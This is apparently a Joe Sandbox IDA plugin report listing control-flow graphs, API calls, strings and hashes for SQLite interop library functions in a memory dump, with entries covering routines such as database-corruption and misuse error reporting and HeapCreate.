                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                      • API String ID: 2981141233-207740414
                                                                                                                                                                                                                                      • Opcode ID: edc5cfa6ef244e1eb16933ecb74dd248f8886dad58de2819396c0843ef8d3f1f
                                                                                                                                                                                                                                      • Instruction ID: c01a656a1e4700233722e4cb76af67fff94d7b4ff319ec33e3af6b25a5a76577
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edc5cfa6ef244e1eb16933ecb74dd248f8886dad58de2819396c0843ef8d3f1f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6761E872B112049BEB14CE19CC90FEB37E9EB88354F058169FC59DB241E738E961CBA4

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1292 6bc67f20-6bc67f36 1293 6bc67fd7-6bc67fda 1292->1293 1294 6bc67f3c 1292->1294 1297 6bc67fdc-6bc67fe9 1293->1297 1298 6bc67fea-6bc67fee 1293->1298 1295 6bc67f42-6bc67f55 call 6bc05f00 1294->1295 1296 6bc68043-6bc68049 1294->1296 1309 6bc67f57 1295->1309 1310 6bc67fcc-6bc67fd2 1295->1310 1302 6bc6804b-6bc68059 1296->1302 1303 6bc680c9-6bc680f1 SI769271af19a2299d 1296->1303 1300 6bc67ff0-6bc67ff2 1298->1300 1301 6bc6800f-6bc68020 call 6bc60ad0 1298->1301 1305 6bc67ff4-6bc67ffc 1300->1305 1306 6bc67ffd-6bc6800c SIaa0f8e0c251cfd1d 1300->1306 1311 6bc68025-6bc6802c 1301->1311 1302->1303 1308 6bc6805b-6bc6806f 1302->1308 1306->1301 1312 6bc68071-6bc6807a 1308->1312 1313 6bc6807b-6bc6807e 1308->1313 1314 6bc67f60-6bc67f6f 1309->1314 1310->1308 1315 6bc68037-6bc68040 1311->1315 1316 6bc6802e-6bc68036 1311->1316 1317 6bc68080-6bc68084 1313->1317 1318 6bc680b9-6bc680c8 1313->1318 1319 6bc67f71-6bc67fbb call 6bbdc3c0 1314->1319 1320 6bc67fbd call 6bc002f0 1314->1320 1315->1296 1321 6bc68096-6bc680b8 call 6bc636f0 1317->1321 1322 6bc68086-6bc68095 call 6bc52840 1317->1322 1330 6bc67fc2-6bc67fca 1319->1330 1320->1330 1330->1310 1330->1314
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,?,?), ref: 6BC68001
                                                                                                                                                                                                                                        • Part of subcall function 6BC60AD0: SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113C6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000074,00000000,?,?,?,?), ref: 6BC60AF8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC680D8
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC680D3
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC680C9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2544783548-2469029621
                                                                                                                                                                                                                                      • Opcode ID: a43057f4406ec8d9ab473f00df2f46283c9f4219bfec2b9d65c3b3397dfb9c56
                                                                                                                                                                                                                                      • Instruction ID: 3827300a5a54328787a508a669a9e4d8f87479ee5e1f166832ad2be7dfb41c58
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a43057f4406ec8d9ab473f00df2f46283c9f4219bfec2b9d65c3b3397dfb9c56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C51E4316187408FD320CF689480F26BBE0EF45314F1449AEE9998B752F36BE945C7A2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1332 6bc57d70-6bc57d8a call 6bc55da0 1335 6bc57db4-6bc57db9 1332->1335 1336 6bc57d8c-6bc57db3 SI769271af19a2299d 1332->1336 1337 6bc57dc5-6bc57dc8 1335->1337 1338 6bc57dbb-6bc57dc2 1335->1338 1339 6bc57e45-6bc57e6b call 6bc52a40 1337->1339 1340 6bc57dca-6bc57dd0 1337->1340 1338->1337 1345 6bc57e70-6bc57e77 1339->1345 1343 6bc57e26-6bc57e31 1340->1343 1344 6bc57dd2-6bc57dd9 1340->1344 1352 6bc57e0e-6bc57e12 1343->1352 1346 6bc57de5-6bc57dfe call 6bc12f30 1344->1346 1347 6bc57ddb-6bc57de2 1344->1347 1349 6bc57e91-6bc57e95 1345->1349 1350 6bc57e79-6bc57e7c 1345->1350 1358 6bc57e00-6bc57e07 1346->1358 1359 6bc57e0a 1346->1359 1347->1346 1355 6bc57e97-6bc57e99 1349->1355 1356 6bc57e9f-6bc57ea8 call 6bc12ec0 1349->1356 1350->1349 1354 6bc57e7e-6bc57e89 SIaa0f8e0c251cfd1d 1350->1354 1360 6bc57e14-6bc57e24 call 6bc293c0 1352->1360 1361 6bc57e33-6bc57e42 1352->1361 1371 6bc57e8e 1354->1371 1355->1356 1362 6bc57e9b-6bc57e9d 1355->1362 1366 6bc57eaa-6bc57eaf 1356->1366 1358->1359 1359->1352 1360->1371 1361->1339 1362->1366 1368 6bc57eb1-6bc57eb8 1366->1368 1369 6bc57ebb-6bc57ec3 1366->1369 1368->1369 1371->1349
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AAD8,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,6BC612CB,tointeger,00000001,00200801,00000000,6BC47D30), ref: 6BC57DA2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57D9B
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57D8C
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57D96
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: eb4a1353b91050f35c2fcd2a863d227731fb6343a8c215b58e8fbe03128cecec
                                                                                                                                                                                                                                      • Instruction ID: fd2a8109820027cff8b90d34a1bfb66e66d7f0d31007216a0b39269aec7ff673
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb4a1353b91050f35c2fcd2a863d227731fb6343a8c215b58e8fbe03128cecec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4441E2B2A102059FEB00CF68D846E5B73A8AF49718F008165FD1DD7200F738DEB187A6

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1375 6bc60ad0-6bc60ae0 1376 6bc60b22-6bc60b2f 1375->1376 1377 6bc60ae2-6bc60b00 SI769271af19a2299d 1375->1377 1380 6bc60b37-6bc60b3e 1376->1380 1378 6bc60b05 1377->1378 1379 6bc60b08-6bc60b0a 1378->1379 1381 6bc60b0c-6bc60b17 1379->1381 1382 6bc60b1a-6bc60b21 1379->1382 1380->1378 1383 6bc60b40-6bc60b4f 1380->1383 1381->1382 1384 6bc60b86-6bc60b8b 1383->1384 1385 6bc60b51-6bc60b57 1383->1385 1388 6bc60be0-6bc60be7 1384->1388 1389 6bc60b8d-6bc60b94 1384->1389 1386 6bc60b76-6bc60b81 call 6bc5a830 1385->1386 1387 6bc60b59-6bc60b73 1385->1387 1395 6bc60bc3 1386->1395 1396 6bc60b83 1386->1396 1387->1386 1391 6bc60b96-6bc60b9c 1389->1391 1392 6bc60b9e-6bc60bc1 SI769271af19a2299d 1389->1392 1391->1388 1391->1392 1394 6bc60bc6-6bc60bcd 1392->1394 1394->1379 1397 6bc60bd3-6bc60bdb call 6bc05f00 1394->1397 1395->1394 1396->1384 1397->1379
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113C6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000074,00000000,?,?,?,?), ref: 6BC60AF8
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113DB,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC60BB4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: b14964b9ba2fb4670efabba33fe3858569cbeb8f102fd5615b1a76aa4336fe98
                                                                                                                                                                                                                                      • Instruction ID: d6b67ff92c0d4cd70b113b1719ddc74f81416fa4b931fbe00278794a6ad999db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b14964b9ba2fb4670efabba33fe3858569cbeb8f102fd5615b1a76aa4336fe98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F31A131A252109FC300DF28C8C1E567BA6AB81764F4A80D9ED58AF352F775EE85C7A1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1400 6bcd6360-6bcd6372 call 6bc55da0 1403 6bcd6378-6bcd637d 1400->1403 1404 6bcd6411-6bcd6438 SI769271af19a2299d 1400->1404 1403->1404 1405 6bcd6383-6bcd6389 1403->1405 1405->1404 1406 6bcd638f-6bcd6394 1405->1406 1407 6bcd6396-6bcd639d 1406->1407 1408 6bcd63a0-6bcd63ba call 6bc2c670 1406->1408 1407->1408 1412 6bcd63bc-6bcd63c3 1408->1412 1413 6bcd63c6-6bcd63c8 1408->1413 1412->1413 1414 6bcd63ca-6bcd63d0 1413->1414 1415 6bcd63d1-6bcd63dc SIdb45e174afb28e2c 1413->1415 1417 6bcd63de-6bcd63e7 1415->1417 1418 6bcd63e8-6bcd6404 call 6bc57d70 1415->1418 1420 6bcd6409-6bcd6410 1418->1420
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(?), ref: 6BCD63D2
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AB6D,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCD6427
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BCD6420
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCD6411
                                                                                                                                                                                                                                      • misuse, xrefs: 6BCD641B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.$Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2065001458-160653349
                                                                                                                                                                                                                                      • Opcode ID: 0de64b323f25ed256f4ce218da8ac5ac8840246a2f63662f2c6c2025af67ec12
                                                                                                                                                                                                                                      • Instruction ID: 77598f3a41c1e53430c5f2890e98af86ac5c8bdb8544f1fcc205190e72d26093
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0de64b323f25ed256f4ce218da8ac5ac8840246a2f63662f2c6c2025af67ec12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE11D276B6161427FA005A69AC82F6B734C9B81A7DF000132FB18EB1C1F769EA10C2B1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1421 6bc60bf0-6bc60bff 1422 6bc60c11-6bc60c17 call 6bc1c820 1421->1422 1423 6bc60c01-6bc60c0b 1421->1423 1427 6bc60c1c-6bc60c23 1422->1427 1423->1422 1424 6bc60c0d-6bc60c0f 1423->1424 1426 6bc60c42-6bc60c46 1424->1426 1429 6bc60cb2-6bc60cb7 1426->1429 1430 6bc60c48-6bc60c5a call 6bc05bc0 1426->1430 1427->1426 1428 6bc60c25-6bc60c2b 1427->1428 1431 6bc60db2-6bc60db8 1428->1431 1432 6bc60c31-6bc60c3c 1428->1432 1433 6bc60c60-6bc60c64 1429->1433 1430->1433 1441 6bc60d5b-6bc60d62 1430->1441 1432->1426 1436 6bc60c66-6bc60c6a 1433->1436 1437 6bc60cb9-6bc60cc2 1433->1437 1436->1437 1438 6bc60c6c-6bc60c70 1436->1438 1439 6bc60cc4-6bc60cc7 1437->1439 1440 6bc60ce3-6bc60ceb 1437->1440 1444 6bc60c72-6bc60c8a 1438->1444 1445 6bc60ca8-6bc60cad 1438->1445 1439->1440 1448 6bc60cc9-6bc60ce1 1439->1448 1442 6bc60ced-6bc60cf3 1440->1442 1443 6bc60cf9-6bc60cff call 6bc1c820 1440->1443 1446 6bc60d87-6bc60d8b 1441->1446 1447 6bc60d64-6bc60d82 SI769271af19a2299d 1441->1447 1442->1443 1449 6bc60cf5-6bc60cf7 1442->1449 1456 6bc60d04-6bc60d0b 1443->1456 1453 6bc60d57-6bc60d59 1444->1453 1460 6bc60c90-6bc60c93 1444->1460 1445->1453 1451 6bc60db0 1446->1451 1452 6bc60d8d-6bc60d8f 1446->1452 1447->1446 1448->1440 1448->1453 1454 6bc60d0d-6bc60d1f call 6bc05bc0 1449->1454 1451->1431 1457 6bc60d91-6bc60da7 call 6bc05d60 1452->1457 1458 6bc60dac 1452->1458 1453->1441 1453->1446 1461 6bc60d33-6bc60d37 1454->1461 1468 6bc60d21-6bc60d2d call 6bc5aad0 1454->1468 1456->1454 1456->1461 1457->1458 1469 6bc60da9 1457->1469 1458->1451 1460->1445 1464 6bc60c95-6bc60ca5 1460->1464 1461->1453 1467 6bc60d39-6bc60d41 1461->1467 1464->1445 1467->1453 1470 6bc60d43-6bc60d54 1467->1470 1468->1461 1469->1458 1470->1453
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000E,%s at line %d of [%.10s],cannot open file,0001002A,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000), ref: 6BC60D7A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC60D73
                                                                                                                                                                                                                                      • cannot open file, xrefs: 6BC60D6E
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC60D64
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$cannot open file$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-1856461355
                                                                                                                                                                                                                                      • Opcode ID: 5da86f60ac647253784052b6d1e62fe8367e4352bc6c4dc0ef7b5550cd6d7c66
                                                                                                                                                                                                                                      • Instruction ID: e7dc5e650eb13447cd00e0b3e76d37469a15afb52fe00bb069dc07c77e83d970
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5da86f60ac647253784052b6d1e62fe8367e4352bc6c4dc0ef7b5550cd6d7c66
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B510631A54740AFE721DB64C8C5F4737E1AB84354F100599D98AAB381F7BDFA86C782

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1475 6bc67e70-6bc67e73 1476 6bc67e75-6bc67e7f 1475->1476 1477 6bc67e85-6bc67eab 1476->1477 1478 6bc67f11-6bc67f14 1476->1478 1479 6bc67eee-6bc67f0c SI769271af19a2299d 1477->1479 1480 6bc67ead-6bc67ede call 6bc60ad0 1477->1480 1479->1478 1482 6bc67ee3-6bc67ee8 1480->1482 1482->1476 1483 6bc67eea-6bc67eed 1482->1483
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011F6E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,00000000,6BC73BDB,00000000,00000000,?,00000000,?,6BC7A704,00000000), ref: 6BC67F04
                                                                                                                                                                                                                                        • Part of subcall function 6BC60AD0: SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113C6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000074,00000000,?,?,?,?), ref: 6BC60AF8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC67EFD
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC67EF8
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC67EEE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 4a018d9436152c749a9b6dd96197c3e0e4f67c6030e62b3a3335cada3b72b53f
                                                                                                                                                                                                                                      • Instruction ID: f9293b5b183cc8f9cdb5d12396cd0eb5d90a460b35a5483bcf7992517cc68938
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a018d9436152c749a9b6dd96197c3e0e4f67c6030e62b3a3335cada3b72b53f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A115361618B504FD324CF38C8C0E63BBF1AF68720B10089EE697CB692F729E805C321
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00BD0000,00000000,6BD15724,00000000,00000000,?,6BC61242,6BD1A358,6BD1A358), ref: 6BC51B41
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000007,failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu,00000000,?,6BC61242,6BD1A358,6BD1A358), ref: 6BC51B5E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 6BC51B57
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHeapI769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                                                                                                                      • API String ID: 1906285390-982776804
                                                                                                                                                                                                                                      • Opcode ID: 1432479d6a72cfc5def2d5d441e61fb95e5514883e08475a928080d9d7d2fac2
                                                                                                                                                                                                                                      • Instruction ID: e8d16d2a907e6b7738a60117d34b17c482d27ef01638696537e128437a71a271
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1432479d6a72cfc5def2d5d441e61fb95e5514883e08475a928080d9d7d2fac2
